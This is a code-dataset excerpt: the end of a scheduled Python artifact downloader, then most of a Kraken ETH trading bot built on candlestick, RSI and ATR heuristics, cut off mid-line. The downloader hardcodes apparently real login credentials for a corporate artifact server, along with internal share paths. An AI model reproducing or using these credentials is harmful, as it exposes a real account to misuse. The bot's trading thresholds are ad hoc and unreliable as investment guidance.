logger.exception(f\"Unexpected error {e}\")\n else:\n logger.success(\n f\"Moved directory from {filepath} to {destination}.\"\n )\n else:\n logger.error(f\"{downloaded} Checksum does not match!\")\n sys.exit(1)\n else:\n logger.warning(f\"File {filename} already exists.\")\n\n\nif __name__ == \"__main__\":\n destination = r\"\\\\SZHVM00556.APAC.BOSCH.COM\\01_Project\\BinaryExchange\\Zeekr\\System test\\Temp_Version\"\n credentials = {\n \"repo\": \"zeekr/8295_ZEEKR/daily_cx1e/\",\n \"pattern\": \"qfil_.*\",\n \"server\": \"https://hw-snc-jfrog-dmz.zeekrlife.com/artifactory/\",\n \"auth\": (\"bosch-gitauto\", \"Bosch-gitauto@123\"),\n \"multithread\": True,\n }\n\n main(credentials, destination)\n schedule.every().hour.do(main, credentials, destination)\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"maple24/vta","sub_path":"scripts/autodownloader.py","file_name":"autodownloader.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29480036346","text":"########## For REST API ###########\r\nimport time\r\nfrom matplotlib.pyplot import close\r\nimport numpy as np\r\nimport urllib\r\nimport hashlib\r\nimport base64\r\nimport hmac\r\nimport requests\r\nimport numpy\r\n########## For REST API ###########\r\n\r\n########## For Trading Strategy ##########\r\nfrom scipy.signal import argrelextrema\r\nimport talib\r\n########## For Trading Strategy ##########\r\n\r\n########## From Other Scripts ##########\r\nimport config\r\nimport api_enum\r\nimport candlestick_id\r\nimport algo_func\r\n########## From Other Scripts ##########\r\n\r\n\r\n########## For WebSocket ###########\r\nimport websocket\r\nimport json\r\nimport datetime\r\n########## For WebSocket ###########\r\n\r\n\r\n########## For REST API ###########\r\n# Define the constants, which are the API URL, API key and API secret key\r\nAPI_URL = \"https://api.kraken.com\"\r\nAPI_KEY = config.API_KEY\r\nAPI_SECRET_KEY = config.PRIVATE_KEY\r\nTRADE_PAIR = \"ETHUSD\"\r\n########## For REST API ###########\r\n\r\n\r\n########## For WebSocket ###########\r\nSOCKET = 'wss://ws.kraken.com'\r\n########## For WebSocket ###########\r\n\r\n########## CONSTANTS ##########\r\n# For receiving pricing data\r\nclose_price_list = []\r\nopen_price_list = []\r\nhigh_price_list = []\r\nlow_price_list = []\r\ntemp_open_price = 1.0\r\ntemp_high_price = 1.0\r\ntemp_low_price = 1.0\r\ntemp_close_price = 1.0\r\n# For candlestick data\r\ncandle_382_list = [np.nan]\r\ncandle_engulfing_list = [np.nan]\r\ncandle_close_ab_list = [np.nan]\r\nnum_candlestick = -1\r\nCANDLE_382_IMP = 0.80\r\nCANDLE_ENGULFING_IMP = 0.80\r\nCANDLE_CLOSE_AB_IMP = 0.80\r\nCANDLE_PERIOD_FOR_TREND = 10 # To adjust how many of the past candlesticks are relevant\r\ncandle_endtime_old = 'reference_endtime' # Set a random number just to allow the candle endtime checking logic\r\n# For RSI\r\nRSI_PERIOD = 14\r\nRSI_PERIOD_FOR_TREND = 6\r\nRSI_OVERBOUGHT = 75\r\nRSI_OVERSOLD = 25\r\n# For determining price trend\r\nTREND_PERIOD = 40 # This should be relating to ATR or some sort instead of a constant\r\nprice_trend = [np.nan for i in range(TREND_PERIOD)]\r\nglobal_support_resistance = 1.0\r\nSMA_PERIOD = 10 # To adjust how many of the past closing price are relevant in calculating the MA\r\nPULLBACK_NUM = 8 # This identifies the number of pullback in a single trend\r\n# For Uptrend/Downtrend Index\r\nBUY_PRESSURE_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on candlestick pattern, RSI and trend\r\nSELL_PRESSURE_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on candlestick pattern, RSI and trend\r\nREVERSAL_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))] # Based on BUY/SELL pressure index, support/resistance and crossover of real price & MA\r\nUPTREND_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))]\r\nDOWNTREND_INDEX_LIST = [np.nan for i in range(np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD))]\r\nTREND_SCORE_THRESHOLD = 0.70\r\nUPTREND_PERIOD = 6\r\nDOWNTREND_PERIOD = 6\r\nspt_rst_time_id = 0\r\n# For Reversal Index\r\nABOVE_SMA = True # Initialsie the variable with a random boolean, this does not matter if it's True or False\r\nREVERSAL_PERIOD = 6\r\n# For Buy/Sell Processes\r\nBUY_SIGNAL = False\r\nSELL_SIGNAL = False\r\nMIN_PRICE = 50000.0\r\nMAX_PRICE = 1.0\r\nSOLD = 0.0\r\nBOUGHT = 0.0\r\nIN_POSITION = False\r\nIN_POSITION_2 = True\r\nBUY_LOWER_THRESHOLD = 0.00\r\nBUY_LOWER_MIDDLE_THRESHOLD = 3.50\r\nBUY_UPPER_MIDDLE_THRESHOLD = 9.0\r\nBUY_UPPER_THRESHOLD = 20.00\r\nSELL_LOWER_THRESHOLD = 0.00\r\nSELL_LOWER_MIDDLE_THRESHOLD = 3.80\r\nSELL_UPPER_MIDDLE_THRESHOLD = 9.0\r\nSELL_UPPER_THRESHOLD = 20.0\r\nSELL_SEC_UP_THRESHOLD = 11.0\r\nSELL_SEC_DOWN_THRESHOLD = 4.0\r\nSELL_SEC_REVERSAL_THRESHOLD = 0.5\r\nLOWER_DOWN_UP_DIFF = 3.50\r\nUPPER_DOWN_UP_DIFF = 20.00\r\nLOWER_UP_DOWN_DIFF = 3.50\r\nUPPER_UP_DOWN_DIFF = 20.00\r\nBUY_REVERSAL_UPPER_THRESHOLD = 2.40\r\nBUY_REVERSAL_LOWER_THRESHOLD = 0.50\r\nSELL_REVERSAL_UPPER_THRESHOLD = 2.00\r\nSELL_REVERSAL_LOWER_THRESHOLD = 0.50\r\nQUANTITY = 0.004\r\nBOUGHT_HIST = []\r\nBOUGHT_TIME = []\r\nSECOND_BOUGHT_TIME = []\r\nSOLD_HIST = []\r\nSOLD_TIME = []\r\nSECOND_SOLD_TIME = []\r\nFINAL_UPTREND_INDEX_LIST = []\r\nFINAL_DOWNTREND_INDEX_LIST = []\r\nFINAL_REVERSAL_INDEX_LIST = []\r\nBUY_SIGNAL_TIME = []\r\nSELL_SIGNAL_TIME = []\r\nKRAKEN_FEES = 0.290 / 100 # 0.579% of the sold quantity, 0.289% for each transaction (buy & sell)\r\nSTOP_LOSS_THRESHOLD = 30.0\r\nBOUGHT_PER_UNIT = 0.0\r\nBOUGHT_PER_UNIT_LIST = []\r\nSOLD_PER_UNIT = 0.0\r\nSOLD_PER_UNIT_LIST = []\r\nORDER_TIMES = 1\r\n########## CONSTANTS ##########\r\n\r\n\r\n########## For WebSocket ###########\r\ndef on_open(ws):\r\n print(\"Opened Connection\")\r\n # Send the data as string, NOTE: All msg sent and received via WebSockets are encoded in JSON format\r\n # json.dumps serialise object to a JSON formatted string\r\n ws.send(json.dumps(payload))\r\n\r\ndef on_close(ws):\r\n print(\"Closed Connection\")\r\n\r\ndef on_message(ws, message):\r\n global candle_endtime_old\r\n global IN_POSITION\r\n global temp_open_price\r\n global temp_high_price\r\n global temp_low_price\r\n global temp_close_price\r\n global num_candlestick\r\n global global_support_resistance\r\n global buy_pressure_index\r\n global sell_pressure_index\r\n global reversal_index\r\n global uptrend_index\r\n global downtrend_index\r\n global ABOVE_SMA\r\n global BOUGHT_PRICE\r\n global BUY_SIGNAL\r\n global SELL_SIGNAL\r\n global MIN_PRICE\r\n global MAX_PRICE\r\n global SOLD\r\n global SOLD_PER_UNIT\r\n global SOLD_PER_UNIT_LIST\r\n global BOUGHT\r\n global BOUGHT_PER_UNIT\r\n global BOUGHT_PER_UNIT_LIST\r\n global spt_rst_time_id\r\n\r\n buy_pressure_index = 0\r\n sell_pressure_index = 0\r\n reversal_index = 0\r\n uptrend_index = 0\r\n downtrend_index = 0\r\n\r\n # Deserialise the received data (in JSON format) to Python object\r\n loaded_msg = json.loads(message)\r\n\r\n # Note that the processed message sent to us will be in the type of list and dictionary\r\n # list for the message from the subscribed stream, dictionary for heartbeat (when there's no subscription traffic within 1 sec)\r\n if type(loaded_msg) == list:\r\n #print(\"Received Message\")\r\n #print(loaded_msg)\r\n\r\n # Check if the newly received message is an update of the same candle or an entire new candle of different timestamp\r\n # Append to the list whenever there is a new candlestick\r\n candle_endtime_now = loaded_msg[1][1] # output: str, candlestick endtime\r\n\r\n if candle_endtime_now != candle_endtime_old:\r\n # This is to isolate the very first message received where the prices could be still updating or already updated\r\n if num_candlestick == -1:\r\n candle_endtime_old = candle_endtime_now\r\n num_candlestick += 1\r\n print(\"Received the very first price but not sure if they are the finalised price or will still be updated\")\r\n else:\r\n # Append the previously stored (finalised) prices into the list\r\n open_price_list.append(temp_open_price) # For opening price, remain the same throughout the timeframe\r\n high_price_list.append(temp_high_price) # For highest price of the candlestick\r\n low_price_list.append(temp_low_price) # For lowest price of the candlestick\r\n close_price_list.append(temp_close_price) # For closing price\r\n candle_endtime_old = candle_endtime_now\r\n num_candlestick += 1\r\n timenow = datetime.datetime.now()\r\n print(timenow.strftime(\"Day: %Y-%m-%d Time: %H%M%S\"))\r\n #print(\"Different candlestick endtime, meaning the previous prices are finalised, appended the finalised price into the list\")\r\n #print(\"Candlestick Opening Price: {}\".format(open_price_list))\r\n #print(\"Candlestick High Price: {}\".format(high_price_list))\r\n #print(\"Candlestick Low Price: {}\".format(low_price_list))\r\n #print(\"Candlestick Closing Price: {}\".format(close_price_list))\r\n print(\"Number of Candlestick: {}\".format(len(close_price_list)))\r\n\r\n # Store a temporary variable of the price, only append to the list once the price is finalised\r\n temp_open_price = float(loaded_msg[1][2])\r\n temp_high_price = float(loaded_msg[1][3])\r\n temp_low_price = float(loaded_msg[1][4])\r\n temp_close_price = float(loaded_msg[1][5])\r\n\r\n # Detect the pattern of 38.2%, Engulfing and Close above/below candle\r\n # Will ignore the updating candlestick, only deal with the finalised one\r\n if len(close_price_list) > 1:\r\n is_candle_382 = candlestick_id.candle_382(open_price_list=open_price_list, high_price_list=high_price_list,\r\n low_price_list=low_price_list, close_price_list=close_price_list)\r\n candle_382_list.append(is_candle_382)\r\n #print(\"Candle 38.2% Pattern: {}\".format(candle_382_list))\r\n\r\n is_candle_engulfing = candlestick_id.candle_engulf(open_price_list=open_price_list,\r\n close_price_list=close_price_list)\r\n candle_engulfing_list.append(is_candle_engulfing) \r\n #print(\"Engulfing Candle Pattern: {}\".format(candle_engulfing_list)) \r\n\r\n is_candle_close = candlestick_id.candle_close_above_below(high_price_list=high_price_list,\r\n low_price_list=low_price_list,\r\n close_price_list=close_price_list)\r\n candle_close_ab_list.append(is_candle_close)\r\n #print(\"Close Above/Below Candle Pattern: {}\".format(candle_close_ab_list)) \r\n\r\n if len(close_price_list) > CANDLE_PERIOD_FOR_TREND:\r\n # Starts calculating for the number of times a certain candle pattern appears in the market\r\n # Output: (0.8, 0.4) --> 0.8 frequency of certain candlestick indicating the existence of buy pressure\r\n # 0.4 frequency of certain candlestick indicating the existence of sell pressure\r\n candle_382_score = np.array(algo_func.find_num_bool(list=candle_382_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_382_IMP\r\n print(\"Candle 38.2% Score: {}\".format(candle_382_score))\r\n candle_engulfing_score = np.array(algo_func.find_num_bool(list=candle_engulfing_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_ENGULFING_IMP\r\n print(\"Engulfing Candle Score: {}\".format(candle_engulfing_score))\r\n candle_close_ab_score = np.array(algo_func.find_num_bool(list=candle_close_ab_list, \r\n timeperiod=CANDLE_PERIOD_FOR_TREND)) * CANDLE_CLOSE_AB_IMP\r\n print(\"Close Above/Below Candle Score: {}\".format(candle_close_ab_score))\r\n\r\n # Sum up all the buy pressure and sell pressure score from the different type of candle\r\n buy_sell_array = np.round(np.sum([candle_382_score, candle_engulfing_score, candle_close_ab_score], axis=0), 2)\r\n print(\"candlestick Buy/Sell Score: {}\".format(buy_sell_array))\r\n buy_pressure_index += buy_sell_array[0]\r\n sell_pressure_index += buy_sell_array[1]\r\n\r\n # Detect whether the market is on an uptrend or downtrend\r\n if len(close_price_list) > TREND_PERIOD:\r\n uptrend_perc = trend_id(high_price_list=high_price_list, low_price_list=low_price_list, \r\n close_price_list=close_price_list, timeperiod=TREND_PERIOD, number=PULLBACK_NUM)\r\n price_trend.append(uptrend_perc[:2])\r\n #print(\"Trends recorded so far: {}\".format(price_trend))\r\n\r\n # Define the support or resistance\r\n is_support, support_resistance_value = uptrend_perc[-1]\r\n spt_rst_time_id = len(close_price_list)\r\n print(\"Support Detected at nth candlestick: {}\".format(spt_rst_time_id))\r\n print(\"Support: {}\".format(is_support))\r\n print(\"Support/Resistance Value: {}\".format(support_resistance_value[0]))\r\n \r\n # Context manager to avoid the current price be identified as a resistance/support\r\n # if (len(close_price_list) - spt_rst_time_id) > 15:\r\n # global_support_resistance =\r\n\r\n # if is_support == True:\r\n\r\n\r\n # NOTE: uptrend_perc[0] is boolean whether it is uptrend\r\n # NOTE: uptrend_perc[1] is the confidence score on the current trend\r\n # On version 4, remove the TREND_SCORE_THRESHOLDD, straight away use the uptrend_perc[1] as the score of down/up trend index\r\n if (uptrend_perc[0] == True):\r\n uptrend_index += uptrend_perc[1]\r\n print(\"Uptrend Score: +{}\".format(uptrend_perc[1]))\r\n elif (uptrend_perc[0] == False):\r\n downtrend_index += uptrend_perc[1]\r\n print(\"Downtrend Score: +{}\".format(uptrend_perc[1]))\r\n\r\n # Calculate Moving Average 20\r\n high_price_list_array = np.array(high_price_list).astype(np.float64)\r\n low_price_list_array = np.array(low_price_list).astype(np.float64)\r\n close_price_list_array = np.array(close_price_list).astype(np.float64)\r\n\r\n sma = talib.SMA(close_price_list_array, timeperiod=SMA_PERIOD)\r\n #print(\"SMA: {}\".format(sma))\r\n if len(REVERSAL_INDEX_LIST) == np.maximum((RSI_PERIOD_FOR_TREND + RSI_PERIOD), TREND_PERIOD):\r\n if sma[-1] > close_price_list[-1]:\r\n ABOVE_SMA = True\r\n print(\"Current Price is below SMA\")\r\n else:\r\n ABOVE_SMA = False\r\n print(\"Current Price is above SMA\")\r\n else:\r\n if sma[-1] > close_price_list[-1]:\r\n NEW_ABOVE_SMA = True\r\n print(\"Current price is below the latest SMA\")\r\n else:\r\n NEW_ABOVE_SMA = False\r\n print(\"Current price is above the latest SMA\")\r\n # There's a sign of reversal if there's a intersection between the MA and the closing price\r\n if NEW_ABOVE_SMA != ABOVE_SMA:\r\n reversal_index += 0.50\r\n print(\"Intersection of MA and closing price so Reversal Index: +0.50\")\r\n ABOVE_SMA = NEW_ABOVE_SMA\r\n print(\"There's a reversal of trend\")\r\n print(\"Current trend above SMA: {}\".format(NEW_ABOVE_SMA))\r\n else:\r\n print(\"There's no reversal of trend\")\r\n print(\"Current trend above SMA: {}\".format(NEW_ABOVE_SMA))\r\n\r\n # Calculate the Average True Range\r\n atr = talib.ATR(high=high_price_list_array, low=low_price_list_array, close=close_price_list_array, timeperiod=14)\r\n print(\"ATR calculated so far: {}\".format(atr))\r\n print(\"Current ATR: {}\".format(atr[-1]))\r\n\r\n # When there's at least number of closing price data, we starts calculating the RSI for it\r\n if len(close_price_list) > (RSI_PERIOD + RSI_PERIOD_FOR_TREND):\r\n np_close_price = np.array(close_price_list).astype(np.float64) # Convert to numpy as required by talib library\r\n rsi = talib.RSI(np_close_price, RSI_PERIOD)\r\n #print(\"RSI calculated so far: {}\".format(rsi))\r\n print(\"Current RSI: {}\".format(rsi[-1]))\r\n\r\n # Add points to the buy/sell pressure index when current RSI is greater/lower than the previous few RSI\r\n if rsi[-1] > rsi[-RSI_PERIOD_FOR_TREND]:\r\n buy_pressure_index += 0.1\r\n print(\"Current RSI is greater than previous RSI so Buy Pressure Index: +0.10\")\r\n else:\r\n sell_pressure_index += 0.1\r\n print(\"Current RSI is smaller than previous RSI so Sell Pressure Index: +0.10\")\r\n\r\n # Possbility of having reversal increases when there's oversold or overbought situation\r\n if (rsi[-1] > RSI_OVERBOUGHT) or (rsi[-1] < RSI_OVERSOLD):\r\n reversal_index += 0.2\r\n print(\"Overbought/Oversold so Reversal Index: +0.2\")\r\n\r\n \r\n \r\n ########## Combine all the indicators and strategy used here ###########\r\n if len(close_price_list) > np.maximum((RSI_PERIOD_FOR_TREND+RSI_PERIOD), TREND_PERIOD):\r\n print(\"Uptrend Index = Buy Pressure Index (RSI + Candle Pattern) + Uptrend Score\")\r\n print(\"Downtrend Index = Sell Pressure Index (RSI + Candle Pattern) + Downtrend Score\")\r\n BUY_PRESSURE_INDEX_LIST.append(buy_pressure_index)\r\n SELL_PRESSURE_INDEX_LIST.append(sell_pressure_index)\r\n #print(\"All Buy Pressure Index: {}\".format(BUY_PRESSURE_INDEX_LIST))\r\n #print(\"All Sell Pressure Index: {}\".format(SELL_PRESSURE_INDEX_LIST))\r\n # Uptrend index consists of the buy pressure index and the uptrend score itself\r\n uptrend_index += buy_pressure_index\r\n downtrend_index += sell_pressure_index\r\n UPTREND_INDEX_LIST.append(uptrend_index)\r\n DOWNTREND_INDEX_LIST.append(downtrend_index)\r\n\r\n # Add score to the reversal index when the difference between uptrend index and downtrend index are small\r\n if abs(UPTREND_INDEX_LIST[-1] - DOWNTREND_INDEX_LIST[-1]) <= 0.4:\r\n reversal_index += 0.40\r\n print(\"Small diff between uptrend and downtrend index, reversal index: +0.40\")\r\n\r\n\r\n #print(\"All Uptrend Index: {}\".format(UPTREND_INDEX_LIST))\r\n #print(\"All Downtrend Index: {}\".format(DOWNTREND_INDEX_LIST))\r\n REVERSAL_INDEX_LIST.append(reversal_index)\r\n #print(\"All Reversal Index: {}\".format(REVERSAL_INDEX_LIST))\r\n\r\n # Take the sum of the past e.g. 6 candlesticks reversal index as the final index, this could be greater than one\r\n final_reversal_index = np.sum(np.array(REVERSAL_INDEX_LIST[-REVERSAL_PERIOD:]))\r\n print(\"Final Reversal Index for the last {} candlestick: {}\".format(REVERSAL_PERIOD, final_reversal_index))\r\n # The same for uptrend index and downtrend index\r\n final_uptrend_index = np.sum(np.array(UPTREND_INDEX_LIST[-UPTREND_PERIOD:]))\r\n final_downtrend_index = np.sum(np.array(DOWNTREND_INDEX_LIST[-DOWNTREND_PERIOD:]))\r\n\r\n print(\"Final uptrend index for the last {} candlestick: {}\".format(UPTREND_PERIOD, final_uptrend_index))\r\n print(\"Final downtrend index for the last {} candlestick: {}\".format(DOWNTREND_PERIOD, final_downtrend_index))\r\n\r\n if IN_POSITION == True:\r\n print(\"In position...\")\r\n \r\n # Stop loss backup plan\r\n if ((BOUGHT_PER_UNIT - close_price_list[-1]) > STOP_LOSS_THRESHOLD):\r\n print(\"The price keeps falling..sell now to stop losses\")\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n SOLD = QUANTITY * close_price_list[-1]\r\n for i in range(ORDER_TIMES):\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, close_price_list[-1]))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, SOLD_PER_UNIT))\r\n IN_POSITION = False\r\n SELL_SIGNAL = False\r\n SOLD_HIST.append(SOLD)\r\n SOLD_TIME.append((timenow.strftime(\"%Y%m%d_%H%M%S\"), \"SL\"))\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"The current price is still above the stop-loss price..Proceed as usual\")\r\n\r\n if SELL_SIGNAL == False:\r\n # Sell when uptrend/downtrend index indicating an uptrend and the reversal index is high\r\n if (final_uptrend_index >= SELL_UPPER_MIDDLE_THRESHOLD) and (final_uptrend_index <= SELL_UPPER_THRESHOLD) and (final_downtrend_index >= SELL_LOWER_THRESHOLD) and (final_downtrend_index <= SELL_LOWER_MIDDLE_THRESHOLD) and ((final_uptrend_index - final_downtrend_index) >= LOWER_UP_DOWN_DIFF) and ((final_uptrend_index - final_downtrend_index) <= UPPER_UP_DOWN_DIFF):\r\n print(\"FUI, {} in between {} and {} ----- FDI, {} in between {} and {}\".format(final_uptrend_index, SELL_UPPER_MIDDLE_THRESHOLD, SELL_UPPER_THRESHOLD,\r\n final_downtrend_index, SELL_LOWER_THRESHOLD, SELL_LOWER_MIDDLE_THRESHOLD))\r\n print(\"Final uptrend index - Final downtrend index, {} in between {} and {}\".format((final_uptrend_index-final_downtrend_index), LOWER_UP_DOWN_DIFF, UPPER_UP_DOWN_DIFF))\r\n if (final_reversal_index >= SELL_REVERSAL_LOWER_THRESHOLD) and (final_reversal_index <= SELL_REVERSAL_UPPER_THRESHOLD):\r\n print(\"Final Reversal Index, {} in between {} and {}\".format(final_reversal_index, SELL_REVERSAL_LOWER_THRESHOLD, SELL_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Sell signal is switched on now\")\r\n SELL_SIGNAL = True\r\n SELL_SIGNAL_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n MAX_PRICE = close_price_list[-1]\r\n\r\n else:\r\n print(\"Final Reversal Index, {} NOT in between {} and {}\".format(final_reversal_index, SELL_REVERSAL_LOWER_THRESHOLD, SELL_REVERSAL_UPPER_THRESHOLD))\r\n print(\"Reversal Condition not met...\")\r\n else:\r\n print(\"Final uptrend index and/or Final downtrend index not met requirement\")\r\n print(\"Check on second set of selling conditions...FUI >= 11.0, FDI <= 4.0, FRI >= 0.5\")\r\n \r\n if (final_uptrend_index >= SELL_SEC_UP_THRESHOLD) and (final_downtrend_index <= SELL_SEC_DOWN_THRESHOLD) and (final_reversal_index >= SELL_SEC_REVERSAL_THRESHOLD):\r\n print(\"Second set of selling conditions are satisfied\")\r\n print(\"Final uptrend index, {} > {} ----- Final downtrend index, {} < {} ----- Final reversal index, {} > {}\".format(final_uptrend_index, SELL_SEC_UP_THRESHOLD, final_downtrend_index, SELL_SEC_DOWN_THRESHOLD, final_reversal_index, SELL_SEC_REVERSAL_THRESHOLD))\r\n print(\"Sell since we already in position and it is a good time to sell\")\r\n print(\"Condition satisfied:\")\r\n\r\n SOLD = QUANTITY * close_price_list[-1]\r\n\r\n if (SOLD - BOUGHT) > 0.0:\r\n print(\"Selling price is greater than the bought price...can proceed\")\r\n print(\"Must have at least {} USD of return to have net profit\".format((SOLD*KRAKEN_FEES) + (BOUGHT*KRAKEN_FEES)))\r\n print(\"Current Return: {}\".format((SOLD - BOUGHT)))\r\n\r\n if (SOLD - BOUGHT) > ((SOLD * KRAKEN_FEES) + (BOUGHT * KRAKEN_FEES)):\r\n print(\"Selling price yields profit even after deducting the trading fees\")\r\n\r\n print(\"Making Sell Order\")\r\n for i in range(ORDER_TIMES):\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, close_price_list[-1]))\r\n SOLD_HIST.append(SOLD)\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n SECOND_SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n IN_POSITION = False\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"Selling price does not yield profit after deducting trading fees..Will not sell now\")\r\n\r\n else:\r\n print(\"Won't sell yet as the current price is lower than bought price although condition satisfied\")\r\n \r\n else:\r\n print(\"Second set of selling condition not met...Will not sell...\")\r\n\r\n elif SELL_SIGNAL == True:\r\n print(\"Sell signal is up..Will sell once the prices starts falling\")\r\n\r\n MAX_PRICE = close_price_list[-1] if close_price_list[-1] > MAX_PRICE else MAX_PRICE\r\n print(\"Maximum price: {}\".format(MAX_PRICE))\r\n print(\"Current price: {}\".format(close_price_list[-1]))\r\n print(\"Last atr: {}\".format(atr[-1]))\r\n print(\"Price difference: {}\".format(MAX_PRICE - close_price_list[-1]))\r\n\r\n if ((MAX_PRICE - close_price_list[-1]) < atr[-1]):\r\n print(\"Hold first since the price is still rising\")\r\n print(\"Price diff is smaller than atr\")\r\n else:\r\n print(\"Price diff is greater than atr\")\r\n print(\"Prices are decreasing significantly..Sell now\")\r\n # Only sell when we have profit\r\n #BOUGHT_PRICE = close_price_list[-1]\r\n print(\"Sell since we already in position and it is a good time to sell\")\r\n print(\"Condition satisfied:\")\r\n\r\n SOLD = QUANTITY * close_price_list[-1]\r\n \r\n if (SOLD - BOUGHT) > 0.0:\r\n print(\"Selling price is greater than the bought price...can proceed\")\r\n print(\"Must have at least {} USD of return to have net profit\".format((SOLD*KRAKEN_FEES) + (BOUGHT*KRAKEN_FEES)))\r\n print(\"Current Return (USD): {}\".format((SOLD - BOUGHT)))\r\n\r\n # Sell when there's profit even after deducting the kraken transaction fees\r\n if (SOLD - BOUGHT) > ((SOLD * KRAKEN_FEES) + (BOUGHT * KRAKEN_FEES)):\r\n print(\"Selling price yields profit even after deducting the trading fees\")\r\n print(\"Bought Price: {}\".format(BOUGHT))\r\n print(\"Current price is greater than the bought price..Can sell\")\r\n\r\n print(\"Making Sell Order\")\r\n for i in range(ORDER_TIMES):\r\n print(\"Order {}:\".format(i))\r\n # resp_sold = kraken_request(url_path=api_enum.USER_TRADING['ADD_ORDER'], \r\n # data={\r\n # \"nonce\": nonce_generator(),\r\n # \"ordertype\": \"market\",\r\n # \"type\": \"sell\",\r\n # \"volume\": QUANTITY,\r\n # \"pair\": TRADE_PAIR,\r\n # }, \r\n # api_key=API_KEY,\r\n # api_sec=API_SECRET_KEY)\r\n # resp_sold = resp_sold.json()\r\n resp_sold = {'error': []}\r\n # Check if the response returns any error\r\n if resp_sold['error'] == []:\r\n print(\"ORDER SUCCEED\")\r\n #print(\"Response: {}\".format(resp_sold['result']))\r\n SOLD_PER_UNIT = close_price_list[-1]\r\n SOLD_PER_UNIT_LIST.append(SOLD_PER_UNIT)\r\n print(\"Sold {} USD at {} per ETH\".format(SOLD, SOLD_PER_UNIT))\r\n SOLD_HIST.append(SOLD)\r\n SOLD_TIME.append(timenow.strftime(\"%Y%m%d_%H%M%S\"))\r\n IN_POSITION = False\r\n FINAL_UPTREND_INDEX_LIST.append(final_uptrend_index)\r\n FINAL_DOWNTREND_INDEX_LIST.append(final_downtrend_index)\r\n FINAL_REVERSAL_INDEX_LIST.append(final_reversal_index)\r\n SELL_SIGNAL = False\r\n\r\n else:\r\n print(\"ORDER FAILED\")\r\n print(\"Error: {}\".format(resp_sold['error']))\r\n\r\n else:\r\n print(\"Selling price does not yield profit after deducting trading fees\")\r\n print(\"Will not sell for now...\")\r\n else:\r\n print(\"Won't sell yet as the current price is lower than bought price although condition satisfied\")\r\n print(\"Will monitor the price, if drops below the stop-loss price, will sell immediately\")\r\n \r\n\r\n\r\n elif IN_POSITION == False:\r\n print(\"Not in position...\")\r\n\r\n if BUY_SIGNAL == False:\r\n # Check if the average true range is above average true range upper threshold, if yes then don't buy first\r\n if (atr[-1] > 4.00):\r\n print(\"ATR is above 4.00, dont buy yet\")\r\n else:\r\n print(\"ATR is not greater than 4.00 or FDI < FUI, will buy if condition satisfied\")\r\n if (final_downtrend_index >= BUY_UPPER_MIDDLE_THRESHOLD) and (final_downtrend_index <= BUY_UPPER_THRESHOLD) and (final_uptrend_index >= BUY_LOWER_THRESHOLD) and (final_uptrend_index <= BUY_LOWER_MIDDLE_THRESHOLD) and ((final_downtrend_index - final_uptrend_index) >= LOWER_DOWN_UP_DIFF) and ((final_downtrend_index - final_uptrend_index) <= UPPER_DOWN_UP_DIFF):\r\n print(\"FDI, {} in between {} and {} ----- FUI, {} in between {} and {}\".format(final_downtrend_index, BUY_UPPER_MIDDLE_THRESHOLD, BUY_UPPER_THRESHOLD,\r\n final_uptrend_index, BUY_LOWER_THRESHOLD, BUY_LOWER_MIDDLE_THRESHOLD))\r\n print(\"Final downtrend index - Final uptrend index, {} in between {} and {}\".format((final_downtrend_index-final_uptrend_index), LOWER_DOWN_UP_DIFF, UPPER_DOWN_UP_DIFF))\r\n if (final_reversal_index >= 